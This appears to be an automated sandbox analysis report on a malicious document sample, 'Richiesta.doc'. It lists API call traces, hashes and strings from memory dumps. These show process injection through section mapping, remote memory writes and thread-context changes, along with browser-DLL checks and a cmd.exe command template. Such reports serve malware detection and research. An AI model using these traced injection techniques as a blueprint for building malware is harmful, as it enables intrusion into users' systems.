  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: cmd.exe Analysis ID: 55548

General

Root Process Name:d3d8sext.exe
Process MD5:AD7B9C14083B52BC532FBA5948342B98
Total matches:133
Initial Analysis Report:Open
Initial sample Analysis ID:55548
Initial sample SHA 256:15C3BD749EEBAB76A5BD75245AF4ECC8B066E8D767A4A91D2AC8209A13D2D33B
Initial sample name:Richiesta.doc

Similar Executed Functions

Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 01B33E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CD171, Relevance: 9.1, APIs: 6, Instructions: 67 Total matches: 31thread
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
